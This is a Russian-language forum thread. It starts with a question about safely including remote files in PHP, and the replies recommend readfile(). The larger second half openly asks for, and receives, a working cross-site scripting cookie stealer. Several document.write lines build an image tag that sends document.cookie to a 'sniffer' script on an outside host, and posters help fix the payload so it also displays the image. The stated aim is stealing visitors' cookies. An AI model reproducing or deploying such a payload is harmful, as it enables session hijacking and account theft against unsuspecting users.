Безопасное использование include
 

Есть скрипт ему передаётся параметр img.
Например script.php?img=http://site.ru/img.gif
Дак вот я зделал такую проверку Дальше идёт Тоесть файл обязательно должен быть .gif , но этого недостаточно так как в img.gif может быть PHP код и он выполнится ведь так??
Если да то как от этого защитится??
-------------------------------
И ещё один вопрос как отобразить через javascript картинку которая является снифером.
Например Img.gif это php скрипт который выводит картинку но таким javascript'ом она невыводится только тырятся куки , а нужен скрипт который и тырит куки и отображает картинку, если это возможно.

Что за бред? Зачем инклюдить, кстати: Юзай http://us3.php.net/readfile =)

попробуй

Да, и вот тебе пример сниффа....

На первый вопрос ответили всем спасибо.
Теперь бы хотелось услышать ответ на второй.

2. Фильтровать все вводимые значения.

Ага, с добрым утром всех.
getimagesize() еще никто не отменял. Да и как правильно заметил nerezus, readfile более оптимальное решение для поставленной задачи. Тестировал скорость работы readfile и include (хотя че тут тестить - ежу понятно что include тормознее в разы). Да и потом если ты делаешь header() с заголовком картинки, а потом readfile()...

Насчет твоего второго вопроса - все просто, скрипт подкинул LoFFi.

2 LoFFi
в данном примере проще юзать readfile, чем fopen.

Всё с первым я уже разобрался, просто забыл про readfile совсем из головы вылетела, что можно читать, а не инклудить файлы.
А на второй вопрос я так и неполучил чёткого ответа.

ошибаешься

И гдеже ответ на второй вопрос

2 EST a1ien
А это и есть ответ на второй вопрос...

Если открываеш таим javascriptom то какртина не отображается, а надо чтобы и картинка отображалясь и куки тырились.
А снифер тут непричём он картину то так выводет а через javascript нет.
Вот к примеру ссылка на html с этим скриптом http://est.jino-net.ru/1.html
Здесь даже наптсано
Даже так он картину неотображает.
sm.gif - обычная каринка.

2 EST a1ien
короче, ты споришь ни о чем. Да, мне лень описывать принцип работы подобного сниффера. но не потому что я ленивая скотина, а потому что это способ описан уже 300 раз и используется каждым вторым!

Да блин мы общаемся на разных языках.
Я говорю про javascript а ты про php снифф.
А прошу сказать как при помощи js отправить запрос к снифу но при этом мне надо что бы отобразилась картинка.
Просто вот таким скриптом
Отправляются куки, но неотображается картинка.
А вот таким
Отображается картинка но неотправляются куки.
А мне надо чтобы и картинка отображалась и куки отправлялись.
Хотя я уже и без вас понял как это зделать просто запихнуть вот такой скрипт

лол. EST a1ien, прежде чем ругать людей, которые пытаются тебе помочь, разбирись со своей задачей и попробуй грамотно выложить ее в своем посте.

По document.write('<img src="http://est.jino-net.ru/xss/s.php"+document.cookie>');
куки не будут писаться, потому что и не должны так писаться. Просто ошибка в этой строчке (где не скажу).

2Trinux я тебя неругал сори если чтото непонравилось как я говорил.
2Егорыч+++ document.write('<img src="http://est.jino-net.ru/xss/s.php?"+document.cookie>');
Правильно если нет то просьба подсказать.

Короче чтобы небыло непоняток выражу свою мысль еще раз.
Допустим есть снифер http://site.ru/s.gif который отображает картинку.
Дак вот мне нужен javascript который пошлёт куки и отобразит картинку.

document.write("<img src="http://est.jino-net.ru/xss/s.php? "+document.cookie+">");


P. S. Послать куки только вставляя одну картинку НЕЛЬЗЯ. Куки бирутся ява скриптом.

Ага большое спасибо.